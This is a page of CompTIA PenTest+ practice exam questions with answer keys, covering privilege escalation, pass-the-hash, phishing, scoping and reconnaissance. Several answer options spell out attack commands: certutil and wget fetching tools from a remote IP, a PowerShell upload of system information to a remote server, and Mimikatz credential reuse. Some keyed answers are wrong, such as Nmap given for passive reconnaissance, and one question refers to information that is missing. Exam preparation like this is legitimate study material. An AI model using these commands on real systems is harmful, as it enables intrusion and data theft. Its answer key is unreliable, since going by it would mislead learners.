CompTIA PT0-002 Online Practice Questions and Exam Preparation

CompTIA PT0-002 Online Questions & Answers

• Question 381:

  A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

  Which of the following commands would help the tester START this process?

  A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
  B. powershell (New-Object System.Net.WebClient).UploadFile(`http://192.168.2.124/upload.php', `systeminfo.txt')
  C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
  D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
  A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe

  ---

  Explanation

  https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to- download-malware-while-bypassing-av/ https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

  The certutil command is a Windows utility that can be used to manipulate certificates and certificate authorities. However, it can also be abused by attackers to download files from remote servers using the -urlcache option. In this case, the command downloads accesschk64.exe from http://192.168.2.124/windows-binaries/ and saves it locally. Accesschk64.exe is a tool that can be used to check service permissions and identify potential privilege escalation vectors. The other commands are not relevant for this purpose. Powershell is a scripting language that can be used to perform various tasks, but in this case it uploads a file instead of downloading one. Schtasks is a command that can be used to create or query scheduled tasks, but it does not help with service permissions. Wget is a Linux command that can be used to download files from the web, but it does not work on Windows by default.

• Question 382:

  A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  A. ROE
  B. SLA
  C. MSA
  D. NDA
  D. NDA

  ---

  Explanation

• Question 383:

  A penetration tester has extracted password hashes from the lsass.exe memory process.

  Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

  A. Use Patator to pass the hash and Responder for persistence.
  B. Use Hashcat to pass the hash and Empire for persistence.
  C. Use a bind shell to pass the hash and WMI for persistence.
  D. Use Mimikatz to pass the hash and PsExec for persistence.
  D. Use Mimikatz to pass the hash and PsExec for persistence.

  ---

  Explanation

  Mimikatz is a credential hacking tool that can be used to extract logon passwords from the LSASS process and pass them to other systems. Once the tester has the hashes, they can then use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system and authenticate with the new credentials. This provides the tester with persistence on the system, allowing them to access it even after a reboot. "A penetration tester who has extracted password hashes from the lsass.exe memory process can use various tools to pass the hash and gain access to other systems using the same credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext passwords from memory or provide a pass-the-hash capability. After gaining access to a system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA PenTest+ Study Guide, p. 186)

• Question 384:

  Which of the following assessment methods is the most likely to cause harm to an ICS environment?

  A. Active scanning
  B. Ping sweep
  C. Protocol reversing
  D. Packet analysis
  A. Active scanning

  ---

  Explanation

  Active scanning is the process of sending probes or packets to a target system or network and analyzing the responses to gather information or identify vulnerabilities. Active scanning can be intrusive and disruptive, especially in an ICS environment, where availability and reliability are critical. Active scanning can cause unintended consequences, such as triggering alarms, shutting down devices, or affecting physical processes. Therefore, active scanning is the most likely to cause harm to an ICS environment among the given options.

• Question 385:

  For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https:// example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

  

  Which of the following lines of code should the security engineer add to make the attack successful?

  A. window.location.= 'https://evilcorp.com'
  B. crossDomain: true
  C. geturlparameter ('username')
  D. redirectUrl = 'https://example.com'
  B. crossDomain: true

  ---

  Explanation

• Question 386:

  Which of the following compliance requirements would be BEST suited in an environment that processes credit card data?

  A. PCI DSS
  B. ISO 27001
  C. SOX
  D. GDPR
  A. PCI DSS

  ---

  Explanation

• Question 387:

  Which of the following should be included in scope documentation?

  A. Service accounts
  B. Tester experience
  C. Disclaimer
  D. Number of tests
  C. Disclaimer

  ---

  Explanation

  A disclaimer is a statement that limits the liability of the penetration tester and the client in case of any unintended consequences or damages caused by the testing activities. It should be included in the scope documentation to clarify the roles

  and responsibilities of both parties and to avoid any legal disputes or misunderstandings. Service accounts, tester experience, and number of tests are not essential elements of the scope documentation, although they may be relevant for

  other aspects of the penetration testing process.

  References:

  The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 1: Planning and Scoping Penetration Tests1;

  The Official CompTIA PenTest+ Student Guide (Exam PT0- 002), Lesson 1: Planning and Scoping Penetration Tests2; What is the Scope of a Penetration Test?3

• Question 388:

  A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server.

  Which of the following is the MOST likely reason for the error?

  A. TCP port 443 is not open on the firewall
  B. The API server is using SSL instead of TLS
  C. The tester is using an outdated version of the application
  D. The application has the API certificate pinned.
  D. The application has the API certificate pinned.

  ---

  Explanation

  This is the most likely reason for the error because the application is unable to validate the certificate issued by the tester's private root CA. Certificate pinning is a process where an application compares the certificate presented by the server with a predefined set of certificates and only accepts connections if the presented certificate is one of the predefined certificates. This means that the application will reject any certificate that is not in the predefined set, even if it is valid.

• Question 389:

  Which of the following tools would be MOST useful in collecting vendor and other security- relevant information for IoT devices to support passive reconnaissance?

  A. Shodan
  B. Nmap
  C. WebScarab-NG
  D. Nessus
  B. Nmap

  ---

  Explanation

• Question 390:

  A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester.

  Which of the following would be the most appropriate NEXT step?

  A. Terminate the contract.
  B. Update the ROE with new signatures. Most Voted
  C. Scan the 8-bit block to map additional missed hosts.
  D. Continue the assessment.
  B. Update the ROE with new signatures. Most Voted

  ---

  Explanation